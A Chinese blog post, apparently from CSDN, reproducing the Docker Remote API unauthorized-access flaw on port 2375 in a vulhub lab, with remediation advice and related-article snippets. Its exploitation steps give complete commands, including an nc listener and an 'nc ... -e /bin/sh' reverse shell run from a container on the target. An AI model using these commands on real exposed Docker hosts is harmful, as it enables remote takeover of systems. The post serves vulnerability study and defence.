Docker Daemon API未授权

最新推荐文章于 2025-02-19 16:43:24 发布
最新推荐文章于 2025-02-19 16:43:24 发布
阅读量544 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 1024程序员节 Docker 容器安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/127485905
本文详细介绍了Docker Remote API的一个安全漏洞,该漏洞允许未授权访问,可能导致远程命令执行。攻击者可以利用暴露在外网的2375端口,通过一系列步骤实现对目标系统的控制。修复建议包括限制网络访问和启用TLS认证。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

影响范围

Docker ALL 

漏洞类型

未授权访问类

利用条件

影响范围应用

漏洞概述

Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行

漏洞复现

环境搭建

下载环境

mkdir docker
cd docker 
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfile
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.yml
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh

 之后给docker-entrypoint.sh赋予执行权限

chmod 777 docker-entrypoint.sh

编译并启动环境

docker-compose up -d

漏洞利用

漏洞检测

docker -H tcp://192.168.17.140:2375 images

反弹shell

Step 1:在VPS上监听9999端口

nc -lnvp 9999

 Step 2:查看目标系统上存在的镜像

docker -H tcp://192.168.17.140:2375 images

 Step 3:之后创建一个轻量级镜像

docker -H tcp://192.168.17.140:2375 run -id  alpine:latest

Step 4:查看运行的容器信息获取对应的容器ID

docker -H tcp://192.168.17.140:2375 ps

  Step 5:进入容器并通过nc进行反弹shell

docker -H tcp://192.168.17.140:2375 exec -it cbb678549422  sh
nc 192.168.17.128 9999 -e /bin/sh

 Step 6:在攻击主机中成功接收到shell

 Step 7:退出并删除容器

exit
docker -H tcp://192.168.17.140:2375 rm cbb678549422 -f
docker -H tcp://192.168.17.140:2375 ps

修复建议

1、对2375端口做网络访问控制,例如:ACL控制

2、修改docker swarm的认证方式,使用TLS认证

19 - vulhub - docker daemon api 未授权访问漏洞(1)
2401_83621634的博客
03-20 1166
1.进入 vulhub 的 docker daemon api 未授权访问漏洞 路径2.编译并启动环境3.查看环境运行状态。
docker daemon api 未授权访问漏洞复现
whojoe的博客
06-30 2522
docker daemon api 未授权访问漏洞复现+环境搭建参考文章 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/docker/unauthorized-rce/ 启动容器 docker-compose up -d 查看容器 docker ps 这里的访问http://127.
Docker Daemon API未授权访问到RCE
Fly_鹏程万里
12-24 3241
影响范围 Docker ALL 漏洞类型 未授权访问类 利用条件 REST API外置 漏洞概述 Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行 漏洞复现 环境搭建 下载环境 mkdir docker cd docker wget https://raw.githubusercontent.com/vulhub/vulhub/master/d..
docker daemon api 未授权访问漏洞
渗透之路,攻防之间皆学问
04-19 5504
一. 漏洞描述 Docker daemon api是使用url代替命令行来操作dockerdocker swarm 是docker下的集群管理工具,在开放2375端口来监听集群容器时,会调用这个api,可以执行docker命令。 二. 漏洞验证 1.环境搭建 使用vulhub的环境 cd /vulhub-master/docker/unauthorized-rce 执行docker-compose up -d启动环境 2.使用浏览器访问2375端口,通过url的方式调用API,返回{"me.
19 - vulhub - docker daemon api 未授权访问漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-15 1860
Docker是一款国内外云平台常用的应用程序轻量级容器,AWS,百度等都有使用。通常用于轻量化部署应用。 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证_docker远程接口未授权访问漏洞怎么解决(1)
2401_84967954的博客
05-12 467
我的docker.service目录在/usr/lib/systemd/system/将tls-client-certs.tar.gz文件发送到客户端,解压到/home目录。客户端证书自动打包为 tls-client-certs.tar.gz。这个地方路径不要错了,否者docker.service 启动不了。服务端的证书生成在: /etc/docker/certs.d。以上就是 Docker 开启TLS,使用生成的证书进行认证。至此:docker API添加了证书认证。在ExecStart中添加。
vulhub漏洞—docker_daemon_api未授权访问漏洞
weixin_45808483的博客
12-17 1421
docker remote api docker remote api主要的目的是取代命令行界面, docker client和docker daemon通过unix domain socket进行通信. 默认情况下,只有本机的root和docker组用户才能操作docker. 漏洞成因 dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375 docker守护进程监听在0.0.0.0,外网可访问 没有使用iptable等限制可连接的来源
利用Vulnhub复现漏洞 - docker daemon api 未授权访问漏洞
JiangBuLiu的博客
07-02 1683
docker daemon api 未授权访问漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.zh-cn.md 漏洞原理 http://www.loner.fm/drops/#!/drops/1203.新...
安全笔记-Docker daemon api 未授权访问漏洞复现及利用
NoooEmotion的博客
02-07 1884
未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2932
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证
关于docker remote api未授权访问漏洞的学习与研究
07-16 733
漏洞介绍: 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker未授权访问漏洞(www.hetianlab.com)
懂进攻知防守
07-20 3458
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器Docker Daemon把服务暴露在tcp的2375端口上,这样就可以在网络上操作Docker了。Docker本身没有身份认证的功能,只要网络上能访问到服务端口,就可以操作Docker。...
【云安全】云原生-Docker(六)Docker API 未授权访问
最新发布
仇辉攻防的博客
02-19 1084
Docker APIDocker 容器平台提供的一组 RESTful API,用于与 Docker 守护程序进行通信和管理 Docker 容器。通过 Docker API,用户可以通过 HTTP 请求来执行诸如创建、启动、停止、删除容器等操作。同时,Docker API 还允许用户管理镜像、网络、卷等 Docker 资源。用户可以使用任何支持 HTTP 请求的工具或库来访问 Docker API,从而实现与 Docker 容器平台的集成和自动化管理。
未授权访问:Docker未授权访问漏洞
qq_68163788的博客
05-14 3506
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
Docker未授权访问漏洞
qq_50854662的博客
10-18 1644
Docker未授权访问漏洞
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 3090
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker未授权漏洞利用,ssh密钥连接
漏洞复现 - - -Docker未授权访问漏洞
weixin_67503304的博客
08-16 5606
Docker未授权访问漏洞,docker未授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
docker2375未授权访问漏洞
01-15
### Docker 2375端口未授权访问漏洞 #### 原因分析 Docker守护进程默认情况下会在TCP端口2375上提供远程API接口,如果此端口暴露于公共网络而没有适当的身份验证机制,则可能导致未经授权的用户能够连接到Docker引擎并执行各种操作。当配置不当或安全措施不足时,攻击者可以利用这一弱点来获取敏感信息甚至控制主机系统[^1]。 #### 影响范围 一旦存在这样的漏洞,潜在的影响非常严重。攻击者可以通过发送特定请求给目标服务器上的Docker服务来进行恶意活动,比如启动新的容器实例、下载镜像文件或是查看当前运行中的容器列表等。更糟糕的是,由于这些行为都是通过合法的服务通道完成的,因此很难被传统的防火墙所阻止。此外,对于那些启用了Swarm模式的环境来说,整个集群都可能受到威胁,因为管理节点之间的通信也是基于同样的API实现的[^2]。 #### 修复建议 为了防止此类安全隐患的发生,应当采取如下预防措施: - **启用TLS加密**:确保所有的API调用都被强制要求经过SSL/TLS协议传输,并且只接受来自已知客户端证书的连接尝试。 - **设置访问权限**:为不同的用户提供最小化的角色定义以及细粒度的操作许可策略;同时考虑部署额外的安全层如OAuth2.0或其他形式的身份认证框架。 - **限制公开暴露**:除非绝对必要,否则不应将Docker Engine监听地址绑定至外网可到达的位置。理想状态下应该仅限局域网内部机器间通讯或者借助反向代理等方式间接对外开放部分功能。 - **定期更新软件版本**:保持官方发布的最新稳定版安装包处于可用状态,及时修补已知缺陷以减少风险敞口。 ```bash # 修改docker.service文件中ExecStart参数添加选项-H unix:///var/run/docker.sock -H tcp://0.0.0.0:2376 --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem sudo systemctl daemon-reload && sudo systemctl restart docker ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值